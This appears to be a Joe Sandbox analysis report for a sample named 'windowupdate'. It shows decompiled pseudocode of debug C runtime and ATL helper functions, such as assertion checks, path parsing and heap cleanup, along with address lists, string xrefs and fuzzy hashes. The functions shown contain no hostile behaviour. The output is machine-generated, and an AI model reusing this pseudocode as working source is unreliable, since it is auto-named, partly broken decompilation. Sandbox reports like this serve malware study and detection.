				_t125 =  *_t61 -  *((intOrPtr*)(_t62 + 4));
				if( *_t61 -  *((intOrPtr*)(_t62 + 4)) < 0) {
					_t82 = L00D84930(_t125, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\_flsbuf.cpp", 0x41, 0, L"%ls", L"(\"inconsistent IOB fields\", stream->_ptr - stream->_base >= 0)");
					_t120 = _t120 + 0x18;
					if(_t82 == 1) {
						asm("int3");
					}
				}
				_t63 = E00D67320( &_a8);
				_v12 =  *_t63 -  *((intOrPtr*)(E00D67320( &_a8) + 4));
				_t65 = E00D67320( &_a8);
				 *((intOrPtr*)(E00D67320( &_a8))) =  *((intOrPtr*)(_t65 + 4)) + 2;
				_t67 = E00D67320( &_a8);
				 *((intOrPtr*)(E00D67320( &_a8) + 8)) =  *((intOrPtr*)(_t67 + 0x18)) - 2;
				_v20 = 0;
				if(_v12 <= 0) {
					__eflags = _v8 - 0xffffffff;
					if(_v8 == 0xffffffff) {
						L9:
						_v16 = 0xdf61f0;
						L10:
						_t106 = _v16;
						_t34 = _t106 + 0x28; // 0xa0a0080
						__eflags =  *_t34 & 0x20;
						if(( *_t34 & 0x20) == 0) {
							goto L13;
						}
						_v36 = E00DB54F0(_v8, 0, 0, 2);
						_v32 = _t106;
						__eflags = (_v36 & _v32) - 0xffffffff;
						if((_v36 & _v32) != 0xffffffff) {
							goto L13;
						}
						E00D99080( &_a8, 0x10);
						return 1;
					}
					__eflags = _v8 - 0xfffffffe;
					if(_v8 == 0xfffffffe) {
						goto L9;
					}
					_v16 = (_v8 & 0x0000003f) * 0x38 +  *((intOrPtr*)(0xf21198 + (_v8 >> 6) * 4));
					goto L10;
				} else {
					_v20 = E00DB46A0(_v8, _v8,  *((intOrPtr*)(E00D67320( &_a8) + 4)), _v12);
					L13:
					 *((short*)( *((intOrPtr*)(E00D67320( &_a8) + 4)))) = _a4;
					if(_v20 != _v12) {
						_v24 = 0;
					} else {
						_v24 = 1;
					}
					return _v24;
				}
			}






















                      0x00dacbb2
                      0x00dacbb7
                      0x00dacbba
                      0x00dacbca
                      0x00dacd2b
                      0x00dacd33
                      0x00dacd36
                      0x00dacd41
                      0x00dacd38
                      0x00dacd38
                      0x00dacd38
                      0x00000000
                      0x00dacd48
                      0x00dacbd3
                      0x00dacbdd
                      0x00dacbe4
                      0x00dacbe7
                      0x00dacbfe
                      0x00dacc03
                      0x00dacc09
                      0x00dacc0b
                      0x00dacc0b
                      0x00dacc09
                      0x00dacc0f
                      0x00dacc23
                      0x00dacc29
                      0x00dacc3c
                      0x00dacc41
                      0x00dacc54
                      0x00dacc57
                      0x00dacc62
                      0x00dacc85
                      0x00dacc89
                      0x00daccac
                      0x00daccac
                      0x00daccb3
                      0x00daccb3
                      0x00daccb6
                      0x00daccba
                      0x00daccbd
                      0x00000000
                      0x00000000
                      0x00daccd1
                      0x00daccd4
                      0x00daccdd
                      0x00dacce0
                      0x00000000
                      0x00000000
                      0x00dacce7
                      0x00000000
                      0x00daccec
                      0x00dacc8b
                      0x00dacc8f
                      0x00000000
                      0x00000000
                      0x00dacca7
                      0x00000000
                      0x00dacc64
                      0x00dacc80
                      0x00daccf0
                      0x00daccff
                      0x00dacd08
                      0x00dacd13
                      0x00dacd0a
                      0x00dacd0a
                      0x00dacd0a
                      0x00000000
                      0x00dacd1a

                      APIs
                        • Part of subcall function 00D98780: std::_Timevec::_Timevec.LIBCPMTD ref: 00D9878F
                      • __wcstombs_l.LIBCMTD ref: 00DACCC9
                      Strings
                      • ("inconsistent IOB fields", stream->_ptr - stream->_base >= 0), xrefs: 00DACBE9
                      • minkernel\crts\ucrt\src\appcrt\stdio\_flsbuf.cpp, xrefs: 00DACBF7
                      • %ls, xrefs: 00DACBEE
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: TimevecTimevec::___wcstombs_lstd::_
                      • String ID: %ls$("inconsistent IOB fields", stream->_ptr - stream->_base >= 0)$minkernel\crts\ucrt\src\appcrt\stdio\_flsbuf.cpp
                      • API String ID: 2681442900-3128027998
                      • Opcode ID: 6ade0c04775bd34bef4dbf8b729af4258f011f96f3b071edb40961c0e7bbc2b4
                      • Instruction ID: cd7c50d76abe3804e805e1522ccf1c5e8921403ec905b186c696ed5381626fef
                      • Opcode Fuzzy Hash: 6ade0c04775bd34bef4dbf8b729af4258f011f96f3b071edb40961c0e7bbc2b4
                      • Instruction Fuzzy Hash: 3151C471D10108EBCF14EF64D956BEE7B70EF01324F249259E82A6B291DB30AA44DBF0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D3E0B0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 107COMMON
                      Download Yara Rule
                      C-Code - Quality: 72%
                      			E00D3E0B0(void* __ebx, signed int* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t56;
				signed int _t57;
				void* _t60;
				signed int _t64;
				void* _t69;
				signed int _t89;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t95;

				_t93 = __esi;
				_t92 = __edi;
				_t69 = __ebx;
				_v28 = 0xcccccccc;
				_v24 = 0xcccccccc;
				_v20 = 0xcccccccc;
				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				if(_v8[1] != _v8[2]) {
					L22:
					E00D3FD00(_v8, _v8[1], _a4);
					_t56 = _v8[1] + 1;
					__eflags = _t56;
					_v8[1] = _t56;
					_t57 = 1;
					L23:
					return E00DC1520(_t57, _t94 - _t95 + 0x18);
				} else {
					goto L1;
				}
				do {
					L1:
					if(_a4 <  *_v8 || _a4 >=  *_v8 + _v8[2]) {
						_v24 = 1;
					} else {
						_v24 = 0;
					}
					_v12 = _v24;
					do {
						_t100 = _v12;
						if(_v12 == 0) {
							_t60 = L00D84930(_t100, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlsimpcoll.h", 0xac, 0, "%ls", L"__atl_condVal");
							_t95 = _t95 + 0x18;
							if(_t60 == 1) {
								asm("int3");
							}
						}
					} while (0 != 0);
					_t103 = _v12;
					if(_v12 == 0) {
						E00D32500(_t69, _t92, _t93, _t103, 0x80004005);
					}
				} while (0 != 0);
				if(_v8[2] != 0) {
					_t89 = _v8[1] << 1;
					__eflags = _t89;
					_v28 = _t89;
				} else {
					_v28 = 1;
				}
				_v20 = _v28;
				if(_v20 < 0 || _v20 > 0x7fffffff) {
					_t57 = 0;
				} else {
					_t64 = E00D82210( *_v8, _v20, 1);
					_t95 = _t95 + 0xc;
					_v16 = _t64;
					__eflags = _v16;
					if(__eflags != 0) {
						_v8[2] = _v20;
						 *_v8 = _v16;
						goto L22;
					}
					_t57 = 0;
				}
			}



















                      0x00d3e0b0
                      0x00d3e0b0
                      0x00d3e0b0
                      0x00d3e0bb
                      0x00d3e0be
                      0x00d3e0c1
                      0x00d3e0c4
                      0x00d3e0c7
                      0x00d3e0ca
                      0x00d3e0cd
                      0x00d3e0dc
                      0x00d3e1be
                      0x00d3e1cc
                      0x00d3e1d7
                      0x00d3e1d7
                      0x00d3e1dd
                      0x00d3e1e0
                      0x00d3e1e5
                      0x00d3e1f2
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d3e0e2
                      0x00d3e0e2
                      0x00d3e0ea
                      0x00d3e105
                      0x00d3e0fc
                      0x00d3e0fc
                      0x00d3e0fc
                      0x00d3e10f
                      0x00d3e112
                      0x00d3e112
                      0x00d3e116
                      0x00d3e130
                      0x00d3e135
                      0x00d3e13b
                      0x00d3e13d
                      0x00d3e13d
                      0x00d3e13b
                      0x00d3e13e
                      0x00d3e142
                      0x00d3e146
                      0x00d3e14d
                      0x00d3e14d
                      0x00d3e152
                      0x00d3e15d
                      0x00d3e16e
                      0x00d3e16e
                      0x00d3e170
                      0x00d3e15f
                      0x00d3e15f
                      0x00d3e15f
                      0x00d3e176
                      0x00d3e17d
                      0x00d3e188
                      0x00d3e18c
                      0x00d3e198
                      0x00d3e19d
                      0x00d3e1a0
                      0x00d3e1a3
                      0x00d3e1a7
                      0x00d3e1b3
                      0x00d3e1bc
                      0x00000000
                      0x00d3e1bc
                      0x00d3e1a9
                      0x00d3e1a9

                      APIs
                      Strings
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlsimpcoll.h, xrefs: 00D3E129
                      • __atl_condVal, xrefs: 00D3E118
                      • %ls, xrefs: 00D3E11D
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: __wdupenv_s
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlsimpcoll.h$__atl_condVal
                      • API String ID: 2478291497-1071720693
                      • Opcode ID: 39b9baf92ca48d838b5bf22477e793726d1579ba25fbea463bed9a8b0592b7e9
                      • Instruction ID: 00deb993781d9be5bbb57c88d3790e328c1ee5042712419e28a558fd97892d22
                      • Opcode Fuzzy Hash: 39b9baf92ca48d838b5bf22477e793726d1579ba25fbea463bed9a8b0592b7e9
                      • Instruction Fuzzy Hash: B141E774E00209EFCB14DF98C985BADB7B1FB48304F2481A9E515A73C5D771AE80DBA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D37E70 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 103COMMON
                      Download Yara Rule
                      C-Code - Quality: 75%
                      			E00D37E70(void* __ecx, intOrPtr* __edx, void* __edi, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v20;
				signed int _v32;
				char _v44;
				signed int _v52;
				void* _t32;
				intOrPtr _t33;
				void* _t35;
				void* _t45;
				void* _t46;
				intOrPtr _t50;
				intOrPtr* _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;

				_t61 = __edx;
				_push(__ecx);
				_t67 =  &_v52;
				memset(_t67, 0xcccccccc, 0xc << 2);
				_t72 = _t71 + 0xc;
				_t68 = _t67 + 0xc;
				_pop(_t50);
				_v8 = _t50;
				if(_a4 == 0) {
					L2:
					_t32 = L00D84930(_t75, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x115, 0, "%ls", L"pOps != 0 && rgStrings != 0");
					_t72 = _t72 + 0x18;
					if(_t32 == 1) {
						asm("int3");
					}
					L4:
					if(_a4 == 0 || _a8 == 0) {
						_t33 = 0x80070057;
						L17:
						_push(_t61);
						E00DC14C0(_t70, 0xd37fa4);
						_t35 = _t33;
						return E00DC1520(_t35, _t70 - _t72 + 0x30);
					} else {
						_v12 = 0;
						while(1) {
							__eflags = _v12;
							if(_v12 < 0) {
								break;
							}
							__eflags =  *_a4;
							if( *_a4 == 0) {
								break;
							}
							_t61 = _a4;
							E00D3A0F0(_v8,  *_t61,  &_v20,  &_v32,  &_v44);
							__eflags = _v20 - 7;
							if(_v20 == 7) {
								_v52 = _v32 | 0x80000000;
								_a4 = _a4 + 4;
								_t61 = _a8;
								_v12 = E00D386D0(_t46, _v8, _t68, _t69, _v52,  &_a4, _t61, _a12, _a16, _a20);
								continue;
							}
							__eflags = 0;
							if(0 == 0) {
								_t45 = L00D84930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x122, 0, "%ls", 0xde40dc);
								_t72 = _t72 + 0x18;
								__eflags = _t45 - 1;
								if(_t45 == 1) {
									asm("int3");
								}
							}
							_t33 = 0x80004005;
							goto L17;
						}
						_t33 = _v12;
						goto L17;
					}
				}
				_t75 = _a8;
				if(_a8 != 0) {
					goto L4;
				}
				goto L2;
			}






















                      0x00d37e70
                      0x00d37e77
                      0x00d37e78
                      0x00d37e85
                      0x00d37e85
                      0x00d37e85
                      0x00d37e87
                      0x00d37e88
                      0x00d37e8f
                      0x00d37e97
                      0x00d37eaf
                      0x00d37eb4
                      0x00d37eba
                      0x00d37ebc
                      0x00d37ebc
                      0x00d37ebd
                      0x00d37ec1
                      0x00d37ec9
                      0x00d37f80
                      0x00d37f80
                      0x00d37f8a
                      0x00d37f8f
                      0x00d37f9f
                      0x00d37ed3
                      0x00d37ed3
                      0x00d37eda
                      0x00d37eda
                      0x00d37ede
                      0x00000000
                      0x00000000
                      0x00d37ee7
                      0x00d37eea
                      0x00000000
                      0x00000000
                      0x00d37efc
                      0x00d37f05
                      0x00d37f0a
                      0x00d37f0e
                      0x00d37f49
                      0x00d37f52
                      0x00d37f61
                      0x00d37f75
                      0x00000000
                      0x00d37f75
                      0x00d37f10
                      0x00d37f12
                      0x00d37f2c
                      0x00d37f31
                      0x00d37f34
                      0x00d37f37
                      0x00d37f39
                      0x00d37f39
                      0x00d37f37
                      0x00d37f3a
                      0x00000000
                      0x00d37f3a
                      0x00d37f7d
                      0x00000000
                      0x00d37f7d
                      0x00d37ec1
                      0x00d37e91
                      0x00d37e95
                      0x00000000
                      0x00000000
                      0x00000000

                      APIs
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D37F8A
                      Strings
                      • %ls, xrefs: 00D37E9C, 00D37F19
                      • pOps != 0 && rgStrings != 0, xrefs: 00D37E97
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h, xrefs: 00D37EA8, 00D37F25
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h$pOps != 0 && rgStrings != 0
                      • API String ID: 930174750-939455025
                      • Opcode ID: d7feb16b21a5e333f186db67754e0e5a0170617bc10e1848591cf0a60bb8be82
                      • Instruction ID: cc73325e9d3fb51f94f41ea6117f94284f7ee2165ba2bed37a2a068a9488fc23
                      • Opcode Fuzzy Hash: d7feb16b21a5e333f186db67754e0e5a0170617bc10e1848591cf0a60bb8be82
                      • Instruction Fuzzy Hash: 1A318FB1A08609BFDB24EF88DC56FEE77B4AF44704F148159F509AA281D7709A84CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D31900 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 91memoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 59%
                      			E00D31900(void* __eflags, intOrPtr _a4) {
				char _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				char _v37;
				char _v52;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v76;
				intOrPtr _v84;
				char _v88;
				void _v92;
				void* _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t38;
				signed int _t39;
				intOrPtr _t42;
				void* _t49;
				void* _t52;
				void* _t53;
				intOrPtr _t66;
				void* _t68;
				void* _t72;
				void* _t74;
				signed int _t75;
				void* _t76;
				intOrPtr _t78;
				char _t79;

				_push(0xfffffffe);
				_push(0xdf2e58);
				_push(E00D49CD0);
				_push( *[fs:0x0]);
				_push(_t52);
				memset( &_v92, 0xcccccccc, 0x10 << 2);
				_t78 = _t76 + 0xffffffffffffffc4;
				_t38 =  *0xdf600c; // 0x71e60372
				_v12 = _v12 ^ _t38;
				_t39 = _t38 ^ _t75;
				_v32 = _t39;
				_push(_t39);
				 *[fs:0x0] =  &_v20;
				_v28 = _t78;
				_v76 = 0;
				_v37 = 1;
				_v8 = 0;
				_v52 = 0;
				_t42 = E00D416D0(_a4,  &_v52,  &_v52, _a4, 0x2000);
				_t79 = _t78 + 0xc;
				_v60 = _t42;
				if(_v60 >= 0) {
					_v84 = _v52 + 0x24;
					E00DBF1D0(_v84);
					_v88 = _t79;
					_v28 = _t79;
					_t66 = _v84;
					E00DC13A0(_v88, _t66,  &_v76);
					_t25 =  &_v88;
					 *_t25 = _v88 + 0x20;
					__eflags =  *_t25;
					_v64 = _v88;
				} else {
					_t66 = 0;
					if(0 == 0 && L00D84930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlalloc.h", 0x272, 0, ?str?, 0xde40dc) == 1) {
						asm("int3");
					}
					_v37 = 0;
				}
				_v8 = 0xfffffffe;
				_push(_v37);
				E00DC13E0(_t52, _t75, 0xd31a58, _v76);
				_pop(_t49);
				_t68 = _t66;
				 *[fs:0x0] = _v20;
				_pop(_t72);
				_pop(_t74);
				_pop(_t53);
				return E00D47280(_t49, _t53, _v32 ^ _t75, _t68, _t72, _t74);
			}


































                      0x00d31903
                      0x00d31905
                      0x00d3190a
                      0x00d31915
                      0x00d31919
                      0x00d31929
                      0x00d31929
                      0x00d3192b
                      0x00d31930
                      0x00d31933
                      0x00d31935
                      0x00d31938
                      0x00d3193c
                      0x00d31942
                      0x00d31945
                      0x00d3194c
                      0x00d31950
                      0x00d31957
                      0x00d3196b
                      0x00d31970
                      0x00d31973
                      0x00d3197a
                      0x00d319b2
                      0x00d319b8
                      0x00d319bd
                      0x00d319c0
                      0x00d319c7
                      0x00d319cd
                      0x00d319d2
                      0x00d319d2
                      0x00d319d2
                      0x00d319d9
                      0x00d3197c
                      0x00d3197c
                      0x00d3197e
                      0x00d319a5
                      0x00d319a5
                      0x00d319a6
                      0x00d319a6
                      0x00d319dc
                      0x00d31a25
                      0x00d31a2f
                      0x00d31a34
                      0x00d31a35
                      0x00d31a3c
                      0x00d31a44
                      0x00d31a45
                      0x00d31a46
                      0x00d31a54

                      APIs
                        • Part of subcall function 00D416D0: _HRESULT_FROM_WIN32.LIBCMTD ref: 00D416E3
                      • @_RTC_AllocaHelper@12.LIBCMT ref: 00D319CD
                      Strings
                      • , xrefs: 00D319D2
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlalloc.h, xrefs: 00D31991
                      • %ls, xrefs: 00D31985
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: AllocaHelper@12
                      • String ID: $%ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlalloc.h
                      • API String ID: 1877400981-3363187302
                      • Opcode ID: 012dd00eead2a87630d317240f17011ee3b1c246d0cb22e18e0e0bb1494bfc2e
                      • Instruction ID: 451544034ca1735fc6469dc95dd0134bc5b41d50d123f3b64a62134b9aeef54c
                      • Opcode Fuzzy Hash: 012dd00eead2a87630d317240f17011ee3b1c246d0cb22e18e0e0bb1494bfc2e
                      • Instruction Fuzzy Hash: 6C319C76E04349AFDB10DFD9DC92BEEBBB4EB48710F104129E502AB281D77559498BB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00DBFE00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66COMMON
                      Download Yara Rule
                      C-Code - Quality: 96%
                      			E00DBFE00(void* __esi, WCHAR* _a4) {
				intOrPtr _v8;
				WCHAR* _v12;
				WCHAR* _v16;
				signed int _t24;
				signed int _t25;
				WCHAR* _t27;
				void* _t32;
				void* _t44;
				void* _t45;

				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_t47 = _a4;
				if(_a4 == 0) {
					_t32 = L00D84930(_t47, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1ca2, 0, L"%ls", L"lpszPathName != 0");
					_t45 = _t45 + 0x18;
					if(_t32 == 1) {
						asm("int3");
					}
				}
				if(_a4 != 0) {
					_v8 = _a4;
					_v12 = _a4;
					while(1) {
						__eflags =  *_v12 & 0x0000ffff;
						if(( *_v12 & 0x0000ffff) == 0) {
							break;
						}
						_t27 = CharNextW(_v12);
						__eflags = _t45 - _t45;
						_v16 = E00DC1520(_t27, _t45 - _t45);
						__eflags = ( *_v12 & 0x0000ffff) - 0x5c;
						if(( *_v12 & 0x0000ffff) == 0x5c) {
							L10:
							_v8 = _v16;
							L11:
							_v12 = _v16;
							continue;
						}
						__eflags = ( *_v12 & 0x0000ffff) - 0x2f;
						if(( *_v12 & 0x0000ffff) == 0x2f) {
							goto L10;
						}
						__eflags = ( *_v12 & 0x0000ffff) - 0x3a;
						if(( *_v12 & 0x0000ffff) != 0x3a) {
							goto L11;
						}
						goto L10;
					}
					_t24 = _v8 - _a4;
					__eflags = _t24;
					_t25 = _t24 >> 1;
					goto L13;
				} else {
					_t25 = 0;
					L13:
					return E00DC1520(_t25, _t44 - _t45 + 0xc);
				}
			}












                      0x00dbfe07
                      0x00dbfe0e
                      0x00dbfe15
                      0x00dbfe1c
                      0x00dbfe20
                      0x00dbfe3a
                      0x00dbfe3f
                      0x00dbfe45
                      0x00dbfe47
                      0x00dbfe47
                      0x00dbfe45
                      0x00dbfe4c
                      0x00dbfe55
                      0x00dbfe5b
                      0x00dbfe5e
                      0x00dbfe64
                      0x00dbfe66
                      0x00000000
                      0x00000000
                      0x00dbfe6e
                      0x00dbfe74
                      0x00dbfe7b
                      0x00dbfe84
                      0x00dbfe87
                      0x00dbfe9f
                      0x00dbfea2
                      0x00dbfea5
                      0x00dbfea8
                      0x00000000
                      0x00dbfea8
                      0x00dbfe8f
                      0x00dbfe92
                      0x00000000
                      0x00000000
                      0x00dbfe9a
                      0x00dbfe9d
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00dbfe9d
                      0x00dbfeb0
                      0x00dbfeb0
                      0x00dbfeb3
                      0x00000000
                      0x00dbfe4e
                      0x00dbfe4e
                      0x00dbfeb6
                      0x00dbfec3
                      0x00dbfec3

                      APIs
                      • CharNextW.USER32(00000000), ref: 00DBFE6E
                      Strings
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00DBFE33
                      • lpszPathName != 0, xrefs: 00DBFE22
                      • %ls, xrefs: 00DBFE27
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CharNext
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$lpszPathName != 0
                      • API String ID: 3213498283-4001971154
                      • Opcode ID: 524647ada3d2708040df273fc9cf1a4065f47fdd5196a41c1305954c02332304
                      • Instruction ID: a4fa8b562bccd7e3470fa3742e4f951fd36b35eeb4c7e2046867613dd2548a4f
                      • Opcode Fuzzy Hash: 524647ada3d2708040df273fc9cf1a4065f47fdd5196a41c1305954c02332304
                      • Instruction Fuzzy Hash: CF215171E00219EFCB14DF99D881AFDBBB1EF45711F1480A9F8456B395D670DA80CBA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D36790 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44memoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 92%
                      			E00D36790(intOrPtr __ecx, void* __esi) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				void* _t23;
				void* _t24;

				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				_t13 = _v8;
				 *_v8 = 0xdf0190;
				if(( *(_v8 + 8) & 0x000000ff) != 0) {
					_t13 = _v8;
					if( *(_v8 + 4) != 0) {
						_v12 = E00DC1520(HeapDestroy( *(_v8 + 4)), _t24 - _t24);
						_t29 = _v12;
						if(_v12 == 0) {
							_t13 = L00D84930(_t29, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlmem.h", 0x74, 0, "%ls", L"bSuccess");
							_t24 = _t24 + 0x18;
							if(_t13 == 1) {
								asm("int3");
							}
						}
					}
				}
				return E00DC1520(_t13, _t23 - _t24 + 8);
			}







                      0x00d36797
                      0x00d3679e
                      0x00d367a5
                      0x00d367a8
                      0x00d367ab
                      0x00d367ba
                      0x00d367bc
                      0x00d367c3
                      0x00d367db
                      0x00d367de
                      0x00d367e2
                      0x00d367f9
                      0x00d367fe
                      0x00d36804
                      0x00d36806
                      0x00d36806
